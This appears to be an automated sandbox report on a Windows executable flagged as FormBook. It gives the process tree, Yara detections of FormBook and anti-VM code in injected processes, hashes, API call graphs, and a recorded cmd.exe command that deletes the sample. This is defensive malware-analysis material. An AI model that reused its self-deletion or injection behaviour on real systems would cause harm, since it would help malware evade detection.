                                  .reloc0x960000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x682800x5aabPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                  RT_ICON0x6dd2c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                  RT_ICON0x7e5540x94a8data
                                  RT_ICON0x879fc0x5488data
                                  RT_ICON0x8ce840x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 4278386688
                                  RT_ICON0x910ac0x25a8data
                                  RT_ICON0x936540x10a8data
                                  RT_ICON0x946fc0x468GLS_BINARY_LSB_FIRST
                                  RT_GROUP_ICON0x94b640x76data
                                  RT_VERSION0x94bdc0x33cdata
                                  RT_MANIFEST0x94f180x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyrightCopyright 2015
                                  Assembly Version1.0.0.0
                                  InternalNameAppDomainManag.exe
                                  FileVersion1.0.0.0
                                  CompanyName
                                  LegalTrademarks
                                  Comments
                                  ProductNameram machine
                                  ProductVersion1.0.0.0
                                  FileDescriptionram machine
                                  OriginalFilenameAppDomainManag.exe

                                  Network Behavior

                                  No network behavior found

                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: Fp4grWelSC.exe PID: 7132 Parent PID: 5332

                                  General

                                  Start time:20:22:21
                                  Start date:13/01/2022
                                  Path:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Fp4grWelSC.exe"
                                  Imagebase:0x370000
                                  File size:595968 bytes
                                  MD5 hash:0E99D13AAFCC5E8FADC45D8B85336D9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp, Author: Joe Security
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: Fp4grWelSC.exe PID: 6436 Parent PID: 7132

                                  General

                                  Start time:20:22:32
                                  Start date:13/01/2022
                                  Path:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Imagebase:0xab0000
                                  File size:595968 bytes
                                  MD5 hash:0E99D13AAFCC5E8FADC45D8B85336D9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.764953786.0000000001820000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6436

                                  General

                                  Start time:20:22:35
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.719080265.000000000E88F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.740140108.000000000E88F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: autochk.exe PID: 6860 Parent PID: 3424

                                  General

                                  Start time:20:23:06
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\autochk.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\SysWOW64\autochk.exe
                                  Imagebase:0x10c0000
                                  File size:871424 bytes
                                  MD5 hash:34236DB574405291498BCD13D20C42EB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 7036 Parent PID: 3424

                                  General

                                  Start time:20:23:07
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.939516998.00000000007C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.939085095.0000000000600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.941177470.0000000000BD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 7080 Parent PID: 7036

                                  General

                                  Start time:20:23:10
                                  Start date:13/01/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 7020 Parent PID: 7080

                                  General

                                  Start time:20:23:11
                                  Start date:13/01/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff724c50000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 5396 Parent PID: 5256

                                  General

                                  Start time:20:23:42
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 3460 Parent PID: 576

                                  General

                                  Start time:20:24:17
                                  Start date:13/01/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:explorer.exe
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: Fp4grWelSC.exe PID: 7132 Parent PID: 5332 Fp4grWelSC.exeCOMMON

                                    Execution Graph

                                    Execution Coverage:11.7%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:83
                                    Total number of Limit Nodes:7

                                    Graph

                                    execution_graph 10920 d640d0 10921 d640e2 10920->10921 10922 d640ee 10921->10922 10926 d641e8 10921->10926 10931 d6388c 10922->10931 10924 d64119 10927 d6420d 10926->10927 10935 d642e8 10927->10935 10939 d642d9 10927->10939 10932 d63897 10931->10932 10947 d65b48 10932->10947 10934 d66fd4 10934->10924 10936 d6430f 10935->10936 10937 d643ec 10936->10937 10943 d63e18 10936->10943 10937->10937 10941 d6430f 10939->10941 10940 d643ec 10940->10940 10941->10940 10942 d63e18 CreateActCtxA 10941->10942 10942->10940 10944 d65378 CreateActCtxA 10943->10944 10946 d6543b 10944->10946 10948 d65b53 10947->10948 10951 d66c54 10948->10951 10950 d6711d 10950->10934 10952 d66c5f 10951->10952 10955 d66c84 10952->10955 10954 d671fa 10954->10950 10956 d66c8f 10955->10956 10959 d66cb4 10956->10959 10958 d672ea 10958->10954 10960 d66cbf 10959->10960 10962 d679fe 10960->10962 10965 d69940 10960->10965 10961 d67a3c 10961->10958 10962->10961 10968 d6ba90 10962->10968 10972 d69978 10965->10972 10969 d6bac1 10968->10969 10970 d6bae5 10969->10970 10990 d6bc50 10969->10990 10970->10961 10975 d69a70 10972->10975 10973 d69956 10973->10962 10976 d69a83 10975->10976 10977 d69a9b 10976->10977 10982 d69cf8 10976->10982 10977->10973 10978 d69a93 10978->10977 10979 d69c98 GetModuleHandleW 10978->10979 10980 d69cc5 10979->10980 10980->10973 10983 d69d0c 10982->10983 10984 d69d31 10983->10984 10986 d68fd0 10983->10986 10984->10978 10987 d69ed8 LoadLibraryExW 10986->10987 10989 d69f51 10987->10989 10989->10984 10991 d6bc5d 10990->10991 10992 d6bc97 10991->10992 10994 d6b114 10991->10994 10992->10970 10995 d6b11f 10994->10995 10997 d6c588 10995->10997 10998 d6b1fc 10995->10998 10997->10997 10999 d6b207 10998->10999 11000 d6c9f7 10999->11000 11001 d66cb4 2 API calls 10999->11001 11005 d6e370 11000->11005 11011 d6e388 11000->11011 11001->11000 11002 d6ca30 11002->10997 11007 d6e3b9 11005->11007 11008 d6e405 11005->11008 11006 d6e3c5 11006->11002 11007->11006 11009 d6ebf8 LoadLibraryExW GetModuleHandleW 11007->11009 11010 d6ec08 LoadLibraryExW GetModuleHandleW 11007->11010 11008->11002 11009->11008 11010->11008 11013 d6e405 11011->11013 11014 d6e3b9 11011->11014 11012 d6e3c5 11012->11002 11013->11002 11014->11012 11015 d6ebf8 LoadLibraryExW GetModuleHandleW 11014->11015 11016 d6ec08 LoadLibraryExW GetModuleHandleW 11014->11016 11015->11013 11016->11013 11017 d6bf90 DuplicateHandle 11018 d6c026 11017->11018 11019 d6bd68 GetCurrentProcess 11020 d6bde2 GetCurrentThread 11019->11020 11021 d6bddb 11019->11021 11022 d6be1f GetCurrentProcess 11020->11022 11023 d6be18 11020->11023 11021->11020 11026 d6be55 11022->11026 11023->11022 11024 d6be7d GetCurrentThreadId 11025 d6beae 11024->11025 11026->11024

                                    Executed Functions

                                    Function 00D6BD68, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00D6BDC8
                                    • GetCurrentThread.KERNEL32 ref: 00D6BE05
                                    • GetCurrentProcess.KERNEL32 ref: 00D6BE42
                                    • GetCurrentThreadId.KERNEL32 ref: 00D6BE9B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 07623716ed29e661dfaf12b73a5e7fa1add80746961c9d1633d1f265ef5929ed
                                    • Instruction ID: 457af241f9999055054a35931f441bea15dc370de1e9799d2fba68a04b027b72
                                    • Opcode Fuzzy Hash: 07623716ed29e661dfaf12b73a5e7fa1add80746961c9d1633d1f265ef5929ed
                                    • Instruction Fuzzy Hash: F45165B09006098FDB54DFAAD5487DEBBF0EB88314F24845AE119A7351DB74A884CF66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D69A70, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 19 d69a70-d69a85 call d68f68 22 d69a87-d69a95 call d69cf8 19->22 23 d69a9b-d69a9f 19->23 22->23 27 d69bd0-d69be9 22->27 24 d69ab3-d69af4 23->24 25 d69aa1-d69aab 23->25 30 d69af6-d69afe 24->30 31 d69b01-d69b0f 24->31 25->24 43 d69bea-d69c48 27->43 30->31 32 d69b33-d69b35 31->32 33 d69b11-d69b16 31->33 37 d69b38-d69b3f 32->37 35 d69b21 33->35 36 d69b18-d69b1f call d68f74 33->36 39 d69b23-d69b31 35->39 36->39 40 d69b41-d69b49 37->40 41 d69b4c-d69b53 37->41 39->37 40->41 45 d69b55-d69b5d 41->45 46 d69b60-d69b69 call d68f84 41->46 68 d69c4a-d69c90 43->68 45->46 50 d69b76-d69b7b 46->50 51 d69b6b-d69b73 46->51 52 d69b7d-d69b84 50->52 53 d69b99-d69b9d 50->53 51->50 52->53 55 d69b86-d69b96 call d68f94 call d68fa4 52->55 58 d69ba3-d69ba6 53->58 55->53 60 d69ba8-d69bc6 58->60 61 d69bc9-d69bcf 58->61 60->61 69 d69c92-d69c95 68->69 70 d69c98-d69cc3 GetModuleHandleW 68->70 69->70 71 d69cc5-d69ccb 70->71 72 d69ccc-d69ce0 70->72 71->72
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00D69CB6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 5ee10fcea7e4b5ec0c37f034ce3e0716637b6f7b189bc09b8d25ee3425a8ace1
                                    • Instruction ID: f4e152e943df895d9b8ea5e1068df740f9374ce0e8fa99c72d7fe554492edb45
                                    • Opcode Fuzzy Hash: 5ee10fcea7e4b5ec0c37f034ce3e0716637b6f7b189bc09b8d25ee3425a8ace1
                                    • Instruction Fuzzy Hash: 517125B0A00B058FDB64DF2AE09175ABBF5FF88304F148A2DD556D7A40DB35E905CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D63E18, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 75 d63e18-d65439 CreateActCtxA 78 d65442-d6549c 75->78 79 d6543b-d65441 75->79 86 d6549e-d654a1 78->86 87 d654ab-d654af 78->87 79->78 86->87 88 d654c0 87->88 89 d654b1-d654bd 87->89 89->88
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00D65429
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 26e4f9d4093cd7f1d30ddbe506610d8aad66660cce4c0541b9b87f6dcd19eab1
                                    • Instruction ID: 8c505edc505592c73146d3179806c5b5d27aad5b065b6404ebca064c39c6a900
                                    • Opcode Fuzzy Hash: 26e4f9d4093cd7f1d30ddbe506610d8aad66660cce4c0541b9b87f6dcd19eab1
                                    • Instruction Fuzzy Hash: E9410471C0472DCFDB24DFA9D84479EBBB1BF88304F248099D508AB255DB756986CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D6BF90, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 91 d6bf90-d6c024 DuplicateHandle 92 d6c026-d6c02c 91->92 93 d6c02d-d6c04a 91->93 92->93
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D6C017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 2d6ea7e3262c4dd3ccba2ebe73578e99e589098cb9dd0461ee3edec12b7e13fe
                                    • Instruction ID: 84086299c1e4ece56c9bb0922b2dbed116b6ccc8e6d4ca71f2b8afacc5a8cc92
                                    • Opcode Fuzzy Hash: 2d6ea7e3262c4dd3ccba2ebe73578e99e589098cb9dd0461ee3edec12b7e13fe
                                    • Instruction Fuzzy Hash: B621C4B5900208DFDB10CFAAD984AEEBBF4EB48324F14841AE954A3350D778A954CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D68FD0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 96 d68fd0-d69f18 98 d69f20-d69f4f LoadLibraryExW 96->98 99 d69f1a-d69f1d 96->99 100 d69f51-d69f57 98->100 101 d69f58-d69f75 98->101 99->98 100->101
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D69D31,00000800,00000000,00000000), ref: 00D69F42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 67b6d77ed159cd76531d3f36294693d2b22bff5e555db25f223b47f88ed36445
                                    • Instruction ID: 55795fd92bc6cda3ce3bd18432cbc7fa5a4b4dc679d7b42f91ae316a824fcc90
                                    • Opcode Fuzzy Hash: 67b6d77ed159cd76531d3f36294693d2b22bff5e555db25f223b47f88ed36445
                                    • Instruction Fuzzy Hash: 7B1136B28002089FDB10CF9AD444BDEFBF8EB48314F14842AE519B7300C774A945CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00D69C50, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 104 d69c50-d69c90 105 d69c92-d69c95 104->105 106 d69c98-d69cc3 GetModuleHandleW 104->106 105->106 107 d69cc5-d69ccb 106->107 108 d69ccc-d69ce0 106->108 107->108
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00D69CB6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688866163.0000000000D60000.00000040.00000001.sdmp, Offset: 00D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d60000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 3b63c85423cc60e30741076ddad4853a7be7cd9351a7932099a93dfe60fe8235
                                    • Instruction ID: 37c6f380d71727c660a7f96fb8f73efeb5b57a9605be33bc10c23f588bba0ae9
                                    • Opcode Fuzzy Hash: 3b63c85423cc60e30741076ddad4853a7be7cd9351a7932099a93dfe60fe8235
                                    • Instruction Fuzzy Hash: 6B1110B1C006098FCB10CFAAD444BDEFBF8AB89324F15841AD429B7700C778A545CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CCD4C4, Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bd63c38145191806ceb51617aaf2ff5507f46b2defe283b152c047d756773fbe
                                    • Instruction ID: 1daa916c5d7517079e67cd04a40e99f14469024a64beaabc8f634f93911436e7
                                    • Opcode Fuzzy Hash: bd63c38145191806ceb51617aaf2ff5507f46b2defe283b152c047d756773fbe
                                    • Instruction Fuzzy Hash: 4B2103B2504240DFCB05DF14D9C0F26BB65FB88328F24C5BDE9064B646C336D946DBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CDD01C, Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cde529918654a95e949bab2cc79660e07eda6b1a607eee85f6453a4776876e1a
                                    • Instruction ID: bf32bfe2c2f99df6a2f2d7885c0e4b929aded540437316d4fc0b580753dd5c60
                                    • Opcode Fuzzy Hash: cde529918654a95e949bab2cc79660e07eda6b1a607eee85f6453a4776876e1a
                                    • Instruction Fuzzy Hash: A921F571904240DFCB14DF24D9C4B26BBA5FBC4314F24C96EDA0A4B346C736E847CA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CDD1D4, Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eab8b023de48d2b6dadc989c6ec1425a400c865126f85502aee90dcb2a4934c2
                                    • Instruction ID: 1b686e082214ae0cf8c465e3120ec2df14ee71f79dcbf34fca950df9d89a402d
                                    • Opcode Fuzzy Hash: eab8b023de48d2b6dadc989c6ec1425a400c865126f85502aee90dcb2a4934c2
                                    • Instruction Fuzzy Hash: 50210771904240EFDB01DF54D9C0B26FBA5FB84314F24C9AEEA0A4B346C736DC46CA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CDD005, Relevance: .1, Instructions: 62COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688720814.0000000000CDD000.00000040.00000001.sdmp, Offset: 00CDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_cdd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aae7094de1bee77cfdab513f2973b53132885d6ec8b595c55184c9c4f1542b2
                                    • Instruction ID: 57beb76ec6dd928fb4476a0ac08dffb3edc150f946dad575a6a29e89f6f9b9d7
                                    • Opcode Fuzzy Hash: 7aae7094de1bee77cfdab513f2973b53132885d6ec8b595c55184c9c4f1542b2
                                    • Instruction Fuzzy Hash: C7217F755093808FCB12CF24D994715BF71AB86314F28C5EBD9498B6A7C33A980ACB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00CCD4BF, Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.688676542.0000000000CCD000.00000040.00000001.sdmp, Offset: 00CCD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ccd000_Fp4grWelSC.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7767b987ea3db680c0edc82855215ff77ee851308bbd899f1b8f69895bb74960
                                    • Instruction ID: 78117145ba0a07d9f1d62757ef9ea6d2b1f742111420998452cf0fc9cea91f9b
